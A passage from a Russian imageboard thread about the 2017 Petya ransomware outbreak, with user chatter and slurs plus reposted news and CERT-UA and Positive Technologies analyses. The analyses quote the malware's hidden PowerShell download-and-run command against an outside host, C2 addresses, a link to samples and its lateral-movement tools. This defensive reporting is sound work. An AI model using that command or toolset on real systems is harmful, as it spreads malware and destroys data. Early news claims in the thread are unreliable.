>4. Действительно шифрует MBR, GPT вроде бы не трогает. Оставляет на локальных дисках файл readme с текстом, аналогичном выводимому при загрузке. Несистемные диски (в т.ч. сетевые) — НЕ шифрует.
>
>>1060100
Аноним 27/06/17 Втр 20:00:49  1060111
RRRAGE!

>>1060105
Понятно что не нужен, но заражение же рандомно происходит.
Аноним 27/06/17 Втр 20:01:10  1060113
RRRAGE!

14964831970400.jpg (74Кб, 451x604)
>>1059804
Аноним 27/06/17 Втр 20:01:33  1060116
RRRAGE!

>>1060104
>антивирус
Одна из самых бесполезных программ в мире, обойти это дерьмо сможет даже школьник, который говонокодит на питоне.
Аноним 27/06/17 Втр 20:01:51  1060117
RRRAGE!

>>1060109
Пиздеж. Покоцал доки на всех дисках, в т ч на съемных. Никаких записок не оставил.
Аноним 27/06/17 Втр 20:01:58  1060118
RRRAGE!

>>1060109
А под системным диском подразумевается логический или физический?
Я так понимаю, можно просто винду переустановить с форматацией и норм?
Аноним 27/06/17 Втр 20:02:58  1060125
RRRAGE!

>>1060116
Да, но этот самый MSE не дал улететь вообще всему; винду удалось поднять через bootrec /fixmbr. А пк без антивируса пришлось форматировать к хуям.
Аноним 27/06/17 Втр 20:03:29  1060128
RRRAGE!

>>1060111
Ну словишь вирус и фиг с ним, пофиксить его как 2 пальца обоссать.
Аноним 27/06/17 Втр 20:03:36  1060129
RRRAGE!

>>1060117
А что не покоцал? Образы True Home Image коцает?
Аноним 27/06/17 Втр 20:03:47  1060132
RRRAGE!

>>1060118
в двух словах если у тебя винт больше 2тб, не ссы
Аноним 27/06/17 Втр 20:03:59  1060134
RRRAGE!

>>1060128
Ну пофикси. А я тебе 1к на карту скину.
Аноним 27/06/17 Втр 20:04:13  1060135
RRRAGE!

>>1059704
>эйчары
>грамотные
Аноним 27/06/17 Втр 20:04:20  1060137
RRRAGE!

>>1060128
Так напиши плиз. Я ж говорю, в треде не видел.
Аноним 27/06/17 Втр 20:05:11  1060140
RRRAGE!

>>1060132
У меня меньше к сожалению. Но выше пишут, что на съемных тоже коцает.
Аноним 27/06/17 Втр 20:05:42  1060142
RRRAGE!

>>1060137
фикс за 300$ в виде ключа
Аноним 27/06/17 Втр 20:06:03  1060144
RRRAGE!

>>1060142
Петя плиз
Аноним 27/06/17 Втр 20:11:03  1060175
RRRAGE!

Зачем они требуют суммы в сотни долларов? Требовали бы там по паре долларов, намного больше людей бы платило. Ещё акции было бы неплохо устраивать, вроде зарази машину знакомого/соседа/корпорации, получи скидку в 20%.
Аноним 27/06/17 Втр 20:11:20  1060179
RRRAGE!

>>1060144
подожди, создам новый биткоин кошелёк.
Аноним 27/06/17 Втр 20:11:27  1060181
RRRAGE!

>>1060134
>>1060137
Что там фиксить ? Не дайте ему зашифровать и всё, чекаешь процессы и видишь что-то подозрительное удаляшь файл от которого это исходит, если он просто выкинет на экран мол, ебать я всё заблокировал, сасай кудасай, офаешь пк с резетки, ибо он не мог так быстро всё зашифровать и просто тянет время пока ты обмазываешь стул повидлом.
Аноним 27/06/17 Втр 20:12:50  1060190
RRRAGE!

>>1060175
Так они корпорации заражают, а те бохатые
Аноним 27/06/17 Втр 20:14:34  1060200
RRRAGE!

>>1060181
Мои бухи заметили что что-то неладное, когда открыли xls файлы и увидели крякозябры вместо привычных таблиц. Как ты представляешь себе чекать процессы 24/7?
Аноним 27/06/17 Втр 20:14:52  1060201
RRRAGE!

>>1060181
Ну я тоже про розетку подумал. А дальше то что? Форматнуть сис.диск?
Алсо, я сплю с включенным компом, он может и ночью ВТАЙНЕ все зашифровать успеть. Тьфу-тьфу-тьфу
Аноним 27/06/17 Втр 20:18:35  1060221
RRRAGE!

>>1060200
Ну подобное грузит систему, так что если у тебя вместо обычных 10% загружено больше, проверяешь процессы.
>>1060201
Удалять то, что скачал перед этим, акронисом/командной строкой/любым другим способом.

Аноним 27/06/17 Втр 20:18:48  1060222
RRRAGE!

>>1060175
Неплохая мысль, вот только бы за каждого зараженного и выплатившего получаешь 2% да даже 1%, тогда бы сотрудники с большим желанием клацали на всё попало, перед тем как выкидывать в чекдиск надо ввести номер свой карты для получения бонуса.
Аноним 27/06/17 Втр 20:20:13  1060229
RRRAGE!

176649.jpg (39Кб, 640x384)
>>1060221
Ты тупенький. На банкомате тоже по-твоему, что-то качали?
Аноним 27/06/17 Втр 20:21:50  1060242
RRRAGE!

>>1060221
А вирусняк-то только в эксешнике может быть или других форматах тоже?
Аноним 27/06/17 Втр 20:22:06  1060243
RRRAGE!

>>1060229
банкоматы скачивают обновления, если ты не знал.
Аноним 27/06/17 Втр 20:22:25  1060245
RRRAGE!

>>1060229
Карточку с вирусом вставили
Аноним 27/06/17 Втр 20:23:41  1060254
RRRAGE!

екненекн.jpg (13Кб, 834x39)
с рабочей станции в роснефти
Аноним 27/06/17 Втр 20:23:46  1060255
RRRAGE!

>>1060245
дайте чаю этому господину
Аноним 27/06/17 Втр 20:24:41  1060261
RRRAGE!

>>1060242
Под многие форматы можно спрятать вирус.
Аноним 27/06/17 Втр 20:25:41  1060270
RRRAGE!

Вирус попадает на пеки в Украине через программу M.E. doc. Так что мамкиным хикканам бояться нечего.
https://antikor.com.ua/articles/176649-virus_petya.a_v_kieve_bankomaty_nachali_prositj_denjgi

Вот поэтому мои бухи его подцепили, а я - нет.
Аноним 27/06/17 Втр 20:25:59  1060272
RRRAGE!

>>1060261
Охуеешь тогда удалять все накачанное
Аноним 27/06/17 Втр 20:26:00  1060273
RRRAGE!

Zero Days (2016[...].webm (18018Кб, 1280x720, 00:02:54)
Zero Days (nois[...].webm (15374Кб, 960x540, 00:02:43)
Охуенно. World war 3.0
Аноним 27/06/17 Втр 20:26:55  1060282
RRRAGE!

>>1060273
У него вирусы в этих вебмах, не открывайте.
Аноним 27/06/17 Втр 20:31:00  1060300
RRRAGE!

>>1060273
Зима близко
Аноним 27/06/17 Втр 20:32:03  1060306
RRRAGE!

>>1060300
Winter is coming
Позиция [REDACTED] по этому вопросу Аноним 27/06/17 Втр 20:32:54  1060310
RRRAGE!

Кибер Коммандование - сидит итт и активно поддерживает анбшные эксплоиты.

ФСБ - пожелал лично расправиться с хакерами физически.

Майкрософт - предложил СКАЧАТЬ ОБНОВЛЕНИЕ, а не сидеть на жопе.

8200 - предлагает больно и унизительно ПОКАРАТЬ ИХ СВОИМ STUXNET'OM

Сноуден - предложил снять документальный фильм про ОХУЕВШИХ ПРОГРАММИСТОВ.

КНДР ХРАНИТ МОЛЧАНИЕ.

Symantec - высрал два невнятных твита.

КАСПЕРСКИЙ - В панике, плачет, т.к. никто не покупает подписку.

Китай - Надеется, что фаерволл остановит этот хаос.

АНБ - Нерво покуривает, т.к. зашифровался главный вход в Форт Мид.
Аноним 27/06/17 Втр 20:33:31  1060313
RRRAGE!

>>1060020
поделись exe'ником
Аноним 27/06/17 Втр 20:39:44  1060342
RRRAGE!

>>1060310
Габен - в общем хл3 не будет
Аноним 27/06/17 Втр 21:41:15  1060572
RRRAGE!

>>1060066
Это новый петя.
Аноним 27/06/17 Втр 21:43:56  1060584
RRRAGE!

>>1060313
тут семплы
https://gist.github.com/vulnersCom/65fe44d27d29d7a5de4c176baba45759
Аноним 27/06/17 Втр 21:45:25  1060591
RRRAGE!

>>1059804
Если хохол, то это медок, слишком много жалоб на эту хуйню отовсюду.
Аноним 27/06/17 Втр 21:47:04  1060595
RRRAGE!

>>1059704
Вроде бы в виндоус нужно отдельно ставить галочку над опцией, которая показывает действительное расширение файла. Как и со скрытыми папками.
Аноним 27/06/17 Втр 21:48:41  1060606
RRRAGE!

>>1060591
Да уже нагуглил, что медок. Пиздос. Можно этих уебанов засудить? На их сайте пусто, поддержка морозится.
напоминаю где смотреть копилку Аноним 27/06/17 Втр 21:51:01  1060618
RRRAGE!

https://blockchain.info/address/1Mz7153HMuxXTuR2R1t78mGSdzaAtNbBWX
уже почти 3 (лол) BTC
Аноним 27/06/17 Втр 21:52:56  1060627
RRRAGE!

>>1060618
М? Расшифруй
Аноним 27/06/17 Втр 21:53:29  1060630
RRRAGE!

2017-06-28025215.png (10Кб, 1187x138)
>>1060618
лол
>>1060627
это кошелек вымогателя, 7к долларов уже
Аноним 27/06/17 Втр 21:55:32  1060637
RRRAGE!

>>1060630
>7к долларов
Чет маловато. Я думал из-за масштабов он уже миллионер.
Аноним 27/06/17 Втр 21:57:49  1060645
RRRAGE!

>>1060637
Просто потихоньку переводятся долбаебы, которые деньги вымогателям платят.
Аноним 27/06/17 Втр 22:01:51  1060662
RRRAGE!

>>1060606
да вряд ли, скорее всего руководство медка уже запаковало чемоданы в израиль
Аноним 27/06/17 Втр 22:11:12  1060679
RRRAGE!

>>1060310
>Касперский
>Русский рэпер
Аноним 27/06/17 Втр 22:12:50  1060687
RRRAGE!

>>1059696
Касперский от Wannacryptа не спас
Аноним 27/06/17 Втр 22:14:20  1060693
RRRAGE!

>>1060687
MSE увидел и удалил петю, но тот все равно каким-то хуем умудрился зашифровать доки.
Аноним 27/06/17 Втр 22:17:01  1060698
RRRAGE! 1

>>1060687
мне лично аутпост помог. но не от wannacry а раньше. от майнера юзающего ту же дыру
qqss77889900.exe
оно пыталось в автозагрузку залезть. аутпост спросил пускать ли. конеш сразу было видно что это зараза. сначала причём непонятно откуда взявшаяся (win7 без обнов)
https://virustotal.com/en/file/04179266d6958f93570732719acef1164d4e593369ab677bc6998aa37a40fd26/analysis/
Аноним 27/06/17 Втр 22:23:46  1060731
RRRAGE!

.jpg (230Кб, 1200x913)
>>1059279 (OP)
> Вирус-вымогатель PETYA.A
Аноним 27/06/17 Втр 22:25:19  1060743
RRRAGE!

>>1059811
Ну так и не пизди.
Ин бифор: > кококомпилировать твой вирус придёца на каждой системе, я скококзал!
10 вопросов о самой масштабной кибератаке в истории Украины Аноним 27/06/17 Втр 22:27:18  1060755
RRRAGE!

1. Кого поразил вирус?

Неизвестный вирус поразил сети целого ряда крупных компаний, в том числе крупных государственных. Известно, что вирус атакует компьютеры на базе Windows.

Около 13.30 "Стране" стало известно о хакерской атаке на "Ощадбанк". При этом в официальном сообщении банк поначалу заявлял, что никакой атаки не было – якобы компьютеры в отделениях перестали работать из-за плановых технических работ.

Известно, что вслед за "Ощадом" вирус охватил также банк "Пивденный", "Укргазбанк", "ТАСКОМБАНК", и небанковские предприятия, среди которых – энергокомпания "Киевэнерго", "Укрпочта", аэропорт "Борисполь", "Укразализныця". Атаке подверглись и негосударственные компании, например, "Новая почта". Вирус даже парализовал сайты всех СМИ Украинского медиахолдинга. От вируса-захватчика также перестала работать вся интернет-сеть Кабинета министров. Уже известно, что вирус атаковал и заправки.

Хакерской атаке подверглись также некоторые крупные госкомпании в России. В частности, о "мощной хакерской атаке" на свои сервера заявила "Роснефть".

Пока неизвестно, являются ли хакерские атаки в Украине и России действиями одной группы лиц.

Полный список пораженных вирусом компаний "Страна" уже собрала. Список постоянно обновляется.

2. Что это за вирус?

IT-специалисты говорят, что это вирус который называется Petya A или mbr locker 256, который относится к вирусам-вымогателям.

MBR - это главная загрузочная запись, код, необходимый для последующей загрузки ОС и расположен в первом секторе устройства. После включения питания компьютера проходит так называемая процедура POST, тестирующая аппаратное обеспечение, по прохождению которой BIOS загружает MBR в оперативную память по адресу 0x7C00 и передает ему управление. Так вирус попадает в компьютер и поражает его. Модификаций вируса существует много.

Специалисты утверждают, что вирус является аналогом WannaCry, который в мае нанес миллиардный ущерб мировой экономике.

3. Как происходит "заражение"?

Как стало известно "Стране" из источников в одном из коммерческих банков, вирус-вымогатель активизируется с помощью ссылки, которая присылается на почту из неизвестного адреса.

Заражение идет через открытие писем. При заражении система падает и пользователь обычно пытается сделать перезагрузку. Но как отмечают эксперты, именно этого делать не стоит: после нее идет полная блокировка системы. Но пока достоверной информации о вирусе нет.

4. Какие симптомы?

Вирус распространяется очень быстро. За несколько часов он поразил десятки компаний по всей Украине.

Симптомы заражения неизвестным вирусом проявляются в отказе работы компьютеров на платформе Windows. Компьютеры перегружаются, а вся информация на них зашифровывается.

Айтишники одной из киевских редакций, проверили один из зараженных компьютеров, и оказалось, что вирус уничтожил все данные на жестком диске.

5. Чего хотят хакеры?

О требованиях вируса стало известно по фото экрана, который появляется при заражении компьютера. На данный момент известно, что вирус блокирует компьютер, а ключ к разблокированию продает за биткоины в эквиваленте $300.

"Хакеры требуют выкуп с биткоинами, но вы же понимаете, если "ляжет" банковская система Украины, хакеры от этого смогут получить профит гораздо больше, чем просто с биткоинов. Нужно следить за транзакциями. Не исключено, что под ударом окажется финмониторинг", – сообщил "Стране" IT-специалист.

6. Как лечить?

Самостоятельно – никак. Когда хакеры получат деньги, обещают прислать код, с помощью которого можно будет разблокировать компьютеры.

7. А это вообще лечится?

Глава ИнАУ Александр Федиенко не советует пользователям пораженных компьютеров соглашаться на требования хакеров и перечислять им деньги. По его словам, "вылечиться" уже не получится.

"Ни в коем случае нельзя перечислять им деньги. Это развод. Никакой код, никакая инструкция не поможет избавиться от вируса. Из того, что проанализировали наши специалисты, ясно, что из-за вируса идет полное шифрование файлов. Всю пораженную вирусом технику можно просто выбросить на помойку. От вируса вылечить компьютеры нереально. Если уже началось шифрование, это уже всё", – сказал "Стране" Федиенко.

8. Какова цель хакеров?

По мнению IT-экспертов, с которыми поговорила "Страна", так как вирус поразил не единичные компании и не ограничился банковскими учреждениями, хакеры намерены нанести ущерб всей экономике Украины.

"Чего хотят добиться хакеры – это скорее вопрос к психологам. Я не знаю. Но сейчас они уже добились того, что в экономике страны случился коллапс. Все застыло. Эта атака, я считаю, была сделала из экономических побуждений, нанести ущерб целой стране, а не отдельным компаниям. Скорее всего, эта атака приведет к большим экономическим убыткам. Это элемент терроризма. Кибер-тероризм", – комментирует Александр Федиенко.

9. Как защититься от вируса?

1) Обязательно пользоваться антивирусами. По мнению специалиста, Virus "Petya А" блокирует сервис Avast, тога как "Касперский" этот вирус не видит. Принудительно обновите базу антивируса и операционные системы.

2) Не скачивать сторонние программы и файлы.

3) Не переходите по сторонним подозрительным ссылкам, в том числе, из соцсетей. Особенно если они исходят от неизвестных вам пользователей. Хотя, по словам Федиенко, не стоит открывать вообще никакие файлы и программы, даже если вам их присылают ваши знакомые. Или пропускать их через антивирусы.

4) Если заражение все-таки произошло, после заражения не перезагружайте компьютер! Этим вы активируете вирус.

"К сожалению, других, более подробных и конкретных рекомендаций пока дать нельзя, потому что до сих пор не ясно до конца, что это за вирус", – говорит Александр Федиенко.

10. Кто стоит за хакерской атакой?

Пока неизвестно. Но то, что атака нацелена на экономику всей страны, говорит о факте вмешательства извне.

Советник министра МВД Антон Геращенко уже заявил, что кибератака под видом вируса-вымогателя была организована со стороны спецслужб РФ.

По словам Федиенко, недавно аналогичный вирус распространялся в Европе.

"Пока нет точных фактов, что это за вирус и откуда он пришел. Но я читал в иностранной прессе, что в Европе недавно была похожая атака. Но она развивалась очень медленно и вяло. Просто в связи с тем, что украинский сегмент интернета очень высокоскоростной, плюс хорошее проникновение абонентов, в Украине этот вирус распространяется молниеносно. Грубо говоря, за полчаса заражено пол-страны", – говорит Федиенко.

Специалист отмечает, что наша страна де-факто оказалась неготовой к такой кибератаке. "Это звездный час подразделения по кибербезопасности. Наши компетентные службы сейчас должны тщательно и быстро все проанализировать и дать четкие рекомендации нашей отрасли, как реагировать и как бороться с вирусом", – отмечает Александр Федиенко.

https://antikor.com.ua/articles/176664-10_voprosov_o_samoj_masshtabnoj_kiberatake_v_istorii_ukrainy сайт может быть заблочен
Аноним 27/06/17 Втр 22:27:20  1060756
RRRAGE!

>>1060698
> (win7 без обнов)
> без обнов
> обновы это зондв ФБРКГБ мне прямо в анус
Ну и сиди, как дурак с зашифрованными файлами.
Аноним 27/06/17 Втр 22:27:46  1060757
RRRAGE!

>>1059279 (OP)
Вот прям напрашивается
https://www.youtube.com/watch?v=e1crf4_aQxU
Аноним 27/06/17 Втр 22:29:44  1060765
RRRAGE!

>>1060584
благодарочки
Аноним 27/06/17 Втр 22:29:51  1060768
RRRAGE!

>>1060756
обновы шindoшs хуже заразы часто. ибо смывают активаторы и тд.
с файлами всё ок. читай не через строчку. это заражение(в конце апреля) привело к тому что я всё залатал и wannacry не прошёл.
Аноним 27/06/17 Втр 22:31:22  1060774
RRRAGE!

>>1060731
Petya и Misha похоже на отсылку к taran & pidoran
Аноним 27/06/17 Втр 22:31:35  1060776
RRRAGE!

>>1060768
> смывают активаторы и тд.
Пиздец проблема, лол. Активировался заново и всё. Пять секунд делов. Но нет, русня стерпит любые неудобства. Вороватая пидорашка.
просто иди нахуй Аноним 27/06/17 Втр 22:36:09  1060802
RRRAGE! 1

14768018020410[[...].jpg (41Кб, 600x450)
Аноним 27/06/17 Втр 22:38:11  1060811
RRRAGE!

>>1060802
Ты ебобо?
Аноним 28/06/17 Срд 00:28:27  1061159
RRRAGE!

>>1060181
>Не дайте ему зашифровать и всё, чекаешь процессы
Всегда думал, что правильно настроенное Software Restriction Policies решит эту проблему.

Админы/кулкакиры в треде, так ли это?
Аноним 28/06/17 Срд 00:35:35  1061174
RRRAGE!

>>1061159
ноунейм
https://habrahabr.ru/company/infosecurity/blog/331788/.a--petya.c--petrwrap-ili-petyacry#comment_10286542

известный васяночник(в каждой второй сборке винды есть его наработки)
https://habrahabr.ru/post/331762/#comment_10285898
Криптовымогатель Petya денег не получит: генерируем ключ разлочки жесткого диска сами Аноним 28/06/17 Срд 01:47:34  1061264
RRRAGE!

https://geektimes.ru/post/274104/
Аноним 28/06/17 Срд 01:57:03  1061280
RRRAGE!

служба e-mail, услугами которой пользовались злоумышленники, заблокировала почтовые адреса, на которые должны приходить данные об уплате выкупа. Так что даже если вы переведете деньги, вам не удастся связаться с ними, подтвердить перевод и получить ключ, необходимый для восстановления файлов.
Аноним 28/06/17 Срд 03:12:24  1061433
RRRAGE!

Найден способ локально остановить исполнение программы вируса-вымогателя Petya, поразившего многие компьютеры в России и на Украине. Для этого в папке с Windows надо создать файл без расширения с именем "perfc" - его отсутствие вирус проверяет перед началом разрушительных действий. Впрочем, эксперты "Лаборатории Касперского" утверждают, что сети атаковал и другой вирус.
Аноним 28/06/17 Срд 03:20:10  1061449
RRRAGE!

Если успеть до перезагрузки компьютера запустить команду bootrec/fixMbr, можно восстановить работоспособность операционной системы и запустить ее, отметили специалисты в Positive Technologies
Аноним 28/06/17 Срд 03:23:20  1061452
RRRAGE! 1

>>1061433
(по другим данным - perfc.dat)
Аноним 28/06/17 Срд 05:10:34  1061532
RRRAGE!

>>1061264
>Хотел разлочить Петю, скачал генератор ключа от добрых людей
>Парни, как разлочить Васю?
Специалисты CERT-UA проанализировали способ распространения вируса Petya Ransomware и разработали рекомендации по защите от него Аноним 28/06/17 Срд 17:10:11  1063892
RRRAGE!

emialmsg1[1].png (126Кб, 950x340)
cnc[1].png (6Кб, 634x121)
Вчера, 27 июня, многие украинские компании подверглись массированной кибератаке, в результате чего компьютеры были заражены вирусом-шифровальщиком Petya Ransomware.


Специалисты команды реагирования на компьютерные чрезвычайные события Украины CERT-UA проанализировали эту атаку и выработали рекомендации по защите компьютеров от проникновения вируса. Так, был проанализирован файл:

[Order-20062017.doc][415FE69BF32634CA98FA07633F4118E1]

hxxps://www.virustotal.com/en/file/fe2e5d0543b4c8769e401ec216d78a5a3547dfd426fd47e097df04a5f7d6d206/analysis/

Данный файл, эксплуатирует уязвимость CVE-2017-0199.

После эксплуатации уязвимости на инфицированный компьютер загружался xls-файл (hxxp://84.200.16.242/myguy.xls)

[myguy.xls][0487382a4daf8eb9660f1c67e30f8b25]

hxxps://www.virustotal.com/en/file/ee29b9c01318a1e23836b949942db14d4811246fdae2f41df9f0dcd922c63bc6/analysis/



Данный xls-файл выступал в качестве загрузчика и содержал в себе обфусцированный javascript код.

После деобфускации кода удалось выяснить, что с помощью команды Powershell на инфицированный компьютер был загружен исполняемый файл:

[myguy.exe][224500132b2537d599fe3314717b7ee5]

powershell.exe -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile(‘hxxp://french-cooking.com/myguy.exe’, ‘%APPDATA%\{random_name}.exe’)

Данный исполняемый файл использовался в качестве загрузчика дальнейшего функционала шифровальщика файлов Petya Ransomware.

Командно-контрольный центр:

hххp://coffeinoffice.xyz:80/cup/wish.php

Механизм распространения был заимствован у шифровальщика файлов WannaCry, который использовал уязвимость MS17-010 для распространения как по локальной, так и по глобальной сети.

После шифрования компьютера происходила перезагрузка системы, в результате которой жертва получала сообщения с требованием выкупа.

Данный тип шифровальщика повреждал таблицу MBR, в результате чего загрузка операционной системы не продолжалось.

По предварительным данным, указанный исполняемый файл загружал в директорию C:\Windows файл с названием perfc.dat, выступавший в качестве основного функционального элемента данного шифровальщика. Удалось выяснить, что шифровальщик файлов устанавливал в планировщике задач команду на перезапуск системы. После перезагрузки системы на инфицированный компьютер приходил фейковый chkdsk.

Следовательно, можно утверждать, что новый подвид Petya.A, который атаковал Украину 27 июня — это комбинация уязвимостей CVE-2017-0199 и MS17-010 (ETERNALBLUE, использованная в Wcry в результате утечки через ShadowBrokers).

Перечень индикаторов компрометации:

84.200.16.242:80

french-cooking.com:443

coffeinoffice.xyz:80

File Name Order-20062017.doc (RTF із CVE-2017-0199)

MD5 Hash Identifier 415FE69BF32634CA98FA07633F4118E1

SHA-1 Hash Identifier 101CC1CB56C407D5B9149F2C3B8523350D23BA84

SHA-256 Hash Identifier FE2E5D0543B4C8769E401EC216D78A5A3547DFD426FD47E097DF04A5F7D6D206

File Name myguy.xls

MD5 Hash Identifier 0487382A4DAF8EB9660F1C67E30F8B25

SHA-1 Hash Identifier 736752744122A0B5EE4B95DDAD634DD225DC0F73

SHA-256 Hash Identifier EE29B9C01318A1E23836B949942DB14D4811246FDAE2F41DF9F0DCD922C63BC6

Рекомендации CERT-UA по обеспечению защиты от заражения вирусом-шифровальщиком:

Обеспечить недопустимость открытия вложений в подозрительных сообщениях (в письмах от адресантов, относительно которых возникают подозрения, например: автор по неизвестным причинам изменил язык общения; тема письма является нетипичной для автора; нетипичное обращение к адресату и т.д.; сообщения с нестандартным текстом, побуждающие к переходу на подозрительные ссылки или к открытию подозрительных файлов — архивов, исполняемых файлов и т.д.).
Системным администраторам и администраторам безопасности обратить внимание на фильтрование входящих/исходящих информационных потоков, в частности почтового и веб-трафика.
Установить официальный патч MS17-010.
На сетевом оборудовании и групповыми политиками заблокировать на системах и серверах порты 135, 445, 1024-1035 TCP.
В случае инфицирования персонального компьютера не перезагружать систему.
Ограничить возможность запуска исполняемых файлов (.exe) на компьютерах пользователей из директорий %TEMP%, %APPDATA%.
Обратиться к рекомендациям CERT-UA по поводу безопасности почтовых сервисов.
Для возможности восстановления зашифрованных файлов воспользоваться программами ShadowExplorer или PhotoRec.
Источник: CERT-UA
Патчи для лечения дыры в MS Office (CVE-2017-0199) Аноним 28/06/17 Срд 18:41:51  1064296
RRRAGE!

Требования - офис 2007sp3 и новее.Windows 7 sp1 и новее
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0199
Начало рассылки пети Аноним 28/06/17 Срд 19:18:12  1064481
RRRAGE!

13 апреля в 22:46
Началась массовая рассылка документов, использующих 0day-уязвимость в Word

https://geektimes.ru/post/288088/
Как победить вирус Petya Аноним 28/06/17 Срд 20:20:56  1064686
RRRAGE!


Анализ образца вымогателя, проведенный нашими экспертами, показал, что принцип действия Petya основан на шифровании главной загрузочной записи (MBR) загрузочного сектора диска и замене его своим собственным. Эта запись – первый сектор на жёстком диске, в нем расположена таблица разделов и программа-загрузчик, считывающая из этой таблицы информацию о том, с какого раздела жёсткого диска будет происходить загрузка системы. Исходный MBR сохраняется в 0x22-ом секторе диска и зашифрован с помощью побайтовой операции XOR с 0x07.

После запуска вредоносного файла создается задача на перезапуск компьютера, отложенная на 1-2 часа, в это время можно успеть запустить команду bootrec /fixMbr для восстановления MBR и восстановить работоспособность ОС. Таким образом, запустить систему даже после ее компрометации возможно, однако расшифровать файлы не удастся. Для каждого диска генерируется свой ключ AES, который существует в памяти до завершения шифрования. Он шифруется на открытом ключе RSA и удаляется. Восстановление содержимого после завершения требует знания закрытого ключа, таким образом, без знания ключа данные восстановить невозможно. Предположительно, зловред шифрует файлы максимум на глубину 15 директорий. То есть файлы, вложенные на большую глубину, находятся в безопасности (по крайней мере для данной модификации шифровальщика).

В случае, если диски оказались успешно зашифрованы после перезагрузки, на экран выводится окно с сообщением о требовании заплатить выкуп $300 (на 27 июня 2017 — примерно 0,123 биткойна) для получения ключа разблокировки файлов. Для перевода денег указан биткоин-кошелек 1Mz7153HMuxXTuR2R1t78mGSdzaAtNbBWX. Через несколько часов после начала атаки на кошелек уже поступают транзакции, кратные запрошенной сумме – некоторые жертвы предпочли заплатить выкуп, не дожидаясь, пока исследователи изучат зловред и попытаются найти средство восстановления файлов.

Petya использует 135, 139, 445 TCP-порты для распространения (с использованием служб SMB и WMI). Распространение внутри сети на другие узлы происходит несколькими методами: с помощью Windows Management Instrumentation (WMI) и PsExec, а также с помощью эксплойта, использующего уязвимость MS17-010 (EternalBlue). WMI – это технология для централизованного управления и слежения за работой различных частей компьютерной инфраструктуры под управлением платформы Windows. PsExec широко используется для администрирования Windows и позволяет выполнять процессы в удаленных системах. Однако для использования данных утилит необходимо обладать привилегиями локального администратора на компьютере жертвы, а значит, шифровальщик может продолжить свое распространение только с тех устройств, пользователь которых обладает максимальными привилегиями ОС. Эксплойт EternalBlue позволяет получить максимальные привилегии на уязвимой системе. Также шифровальщик использует общедоступную утилиту Mimikatz для получения в открытом виде учетных данных всех пользователей ОС Windows, в том числе локальных администраторов и доменных пользователей. Такой набор инструментария позволяет Petya сохранять работоспособность даже в тех инфраструктурах, где был учтен урок WannaCry и установлены соответствующие обновления безопасности, именно поэтому шифровальщик настолько эффективен.

В рамках тестирований на проникновение современных корпоративных инфраструктур эксперты Positive Technologies регулярно демонстрируют возможность применения эксплойта EternalBlue (в 44% работ в 2017 году), а также успешное применение утилиты Mimikatz для развития вектора атаки до получения полного контроля над доменом (в каждом проекте).

Таким образом, Petya обладает функциональностью, позволяющей ему распространяться на другие компьютеры, причем этот процесс лавинообразный. Это позволяет шифровальщику скомпрометировать в том числе контроллер домена и развить атаку до получения контроля над всеми узлами домена, что эквивалентно полной компрометации инфраструктуры.

О существующей угрозе компрометации мы сообщали более месяца назад в оповещениях об атаке WannaCry и давали рекомендации, каким образом определить уязвимые системы, как их защитить и что делать, если атака уже произошла. Дополнительные рекомендации мы дадим и в данной статье. Кроме того, наша компания разработала бесплатную утилиту WannaCry_Petya_FastDetect для автоматизированного выявления уязвимости в инфраструктуре. Система MaxPatrol выявляет данную уязвимость как в режиме Audit, так и в режиме Pentest. Подробная инструкция указана в наших рекомендациях. Кроме того, в MaxPatrol SIEM заведены соответствующие правила корреляции для выявления атаки Petya.

Эксперты Positive Technologies выявили “kill-switch” – возможность локально отключить шифровальщик. Если процесс имеет административные привилегии в ОС, то перед подменой MBR шифровальщик проверяет наличие файла perfc (либо другого пустого файла с иным названием) без расширения в директории C:\Windows\ (директория жестко задана в коде). Этот файл носит то же имя, что и библиотека dll данного шифровальщика (но без расширения).

Наличие такого файла в указанной директории может быть одним из индикаторов компрометации. Если файл присутствует в данной директории, то процесс выполнения ВПО завершается, таким образом, создание файла с правильным именем может предотвратить подмену MBR и дальнейшее шифрование.



Если шифровальщик при проверке не обнаружит такой файл, то файл создается и стартует процесс выполнения ВПО. Предположительно, это происходит для того, чтобы повторно не запустился процесс подмены MBR.

С другой стороны, если процесс изначально не обладает административными привилегиями, то шифровальщик не сможет выполнить проверку наличия пустого файла в директории C:\Windows\, и процесс шифрования файлов все же запустится, но без подмены MBR и перезапуска компьютера.
Для того, чтобы не стать жертвой подобной атаки, необходимо в первую очередь обновить используемое ПО до актуальных версий, в частности, установить все актуальные обновления MS Windows. Кроме того, необходимо минимизировать привилегии пользователей на рабочих станциях.

Если заражение уже произошло, мы не рекомендуем платить деньги злоумышленникам. Почтовый адрес нарушителей wowsmith123456@posteo.net был заблокирован, и даже в случае оплаты выкупа ключ для расшифрования файлов наверняка не будет получен. Для предотвращения распространения шифровальщика в сети рекомендуется выключить другие компьютеры, которые не были заражены, отключить от сети зараженные узлы и снять образы скомпрометированных систем. В случае, если исследователи найдут способ расшифрования файлов, заблокированные данные могут быть восстановлены в будущем. Кроме того, данный образ может быть использован для проведения анализа шифровальщика, что поможет исследователям в их работе.

В долгосрочной перспективе рекомендуется разработать систему регулярных тренингов сотрудников с целью повышения их осведомленности в вопросах информационной безопасности, основанную на демонстрации практических примеров потенциально возможных атак на инфраструктуру компании с использованием методов социальной инженерии. Необходимо проводить регулярную проверку эффективности таких тренингов. Также необходимо на все компьютеры установить антивирусное ПО с функцией самозащиты, предусматривающей ввод специального пароля для отключения или изменения настроек. Кроме того, необходимо обеспечить регулярное обновление ПО и ОС на всех узлах корпоративной инфраструктуры, а также эффективный процесс управления уязвимостями и обновлениями. Регулярное проведение аудитов ИБ и тестирований на проникновение позволит своевременно выявлять существующие недостатки защиты и уязвимости систем. Регулярный мониторинг периметра корпоративной сети позволит контролировать доступные из сети Интернет интерфейсы сетевых служб и вовремя вносить корректировки в конфигурацию межсетевых экранов. Для своевременного выявления и пресечения уже случившейся атаки необходимо осуществлять мониторинг внутренней сетевой инфраструктуры, для чего рекомендуется применять систему класса SIEM.

Для выявления атаки Petya в инфраструктуре могут быть использованы следующие индикаторы:

C:\Windows\perfс
Задача в планировщике Windows с пустым именем и действием (перезагрузка)
"%WINDIR%\system32\shutdown.exe /r /f"

Срабатывание правил IDS/IPS:
<не влезло>


https://habrahabr.ru/company/pt/blog/331858/

[Назад][Обновить тред][Вверх][Каталог] [Реквест разбана] [Подписаться на тред] [ ] 223 | 21 | 61
Назад Вверх Каталог Обновить

Топ тредов
Избранное